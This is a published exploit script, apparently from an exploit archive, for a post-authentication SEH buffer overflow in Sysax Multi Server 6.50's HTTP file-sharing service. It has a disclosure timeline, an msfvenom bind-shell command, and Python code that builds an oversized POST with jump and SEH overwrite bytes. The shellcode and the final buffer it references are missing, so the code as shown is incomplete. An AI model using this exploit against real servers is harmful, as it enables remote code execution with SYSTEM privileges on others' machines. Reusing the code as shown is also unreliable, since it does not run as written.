Sysax Multi Server 6.50 - HTTP File Share Overflow Remote Code Execution (SEH)









# Exploit Title: Sysax Multi Server 6.50 HTTP File Share SEH Overflow RCE Exploit
# Date: 03/21/2016
# Exploit Author: Paul Purcell
# Contact: ptpxploit at gmail
# Vendor Homepage:
# Vulnerable Version Download: (6.50 as of posting date)
# Version: Sysax Multi Server 6.50
# Tested on: Windows XP SP3 English
# Category: Remote Code Execution
# Timeline: 03/11/16 Bug found
#           03/14/16 Vender notified
#           03/17/16 Vender acknowledges issue and publishes patch (6.51)
#           03/21/16 Exploit Published
# Summary:  This is a post authentication exploit that requires the HTTP file sharing service to be running on
#           Sysas Multi Server 6.50. The SID can be retrieved from your browser's URL bar after logging into the
#           service. Once exploited, the shellcode runs with SYSTEM privileges.  In this example, we attack folder_
#           in dltslctd_name1.htm.  The root path of the user shouldn't break the buffer offset in the stack, though
#           the user will need to have permission to delete folders.  If the user has file delete permissions, file_
#           will work as well.  mk_folder1_name1 is also vulnerable with a modified buffer, so this same exploit can
#           be modified to adapt to a users permissions.

import httplib

target = 'webbackup'
port = 80
sid = '57e546cb7204b60f0111523409e49bdb16692ab5'            #retrieved from browser URL after login
#example: http://hostname/scgi?sid=57e546cb7204b60f0111523409e49bdb16692ab5&pid=dltslctd_name1.htm

#msfvenom -p windows/shell_bind_tcp LPORT=4444 --platform windows -a x86 -f c -b "\x00\x0a"


arg="folder_"                       #can also be changed to file_ if user has file delete permissions
pid="dltslctd_name1"                #Can be changed, though padding will needed to be updated as well 
junk1="A"*26400                     #Initial pile of junk
noppad="\x90"*296                   #Place to land from our long jump and before our shellcode
junkfill="\x90"*(768-len(shell))    #Fill in after our shellcode till nseh    
nseh="\xeb\x06\x90\x90"             #Short jump over SEH
seh="\xd7\x2a\x92\x5d"              #pop esi # pop edi # ret RPCNS4.dll
jump="\xe9\x13\xfc\xff\xff"         #jump back 1000 bytes for plenty of room for your shellcode
junk2="D"*9500                      #Junk at the end


head = "Host: Wee! \r\n"
head += "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\r\n"
head += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
head += "Accept-Language: en-us,en;q=0.5\r\n"
head += "Accept-Encoding: gzip, deflate\r\n"
head += "Referer: http://gotcha/scgi?sid="+sid+"&pid="+pid+".htm\r\n"
head += "Proxy-Connection: keep-alive\r\n"
head += "Content-Type: multipart/form-data; boundary=---------------------------20908311357425\r\n"
head += "Content-Length: 1337\r\n"
head += "If-Modified-Since: *\r\n"
head += "\r\n"
head += "-----------------------------217830224120\r\n"
head += "\r\n"
head += "\r\n"
head += "\r\n"
head += buff

conn = httplib.HTTPConnection(target,port)
conn.request("POST", "/scgi?sid="+sid+"&pid="+pid+".htm", head)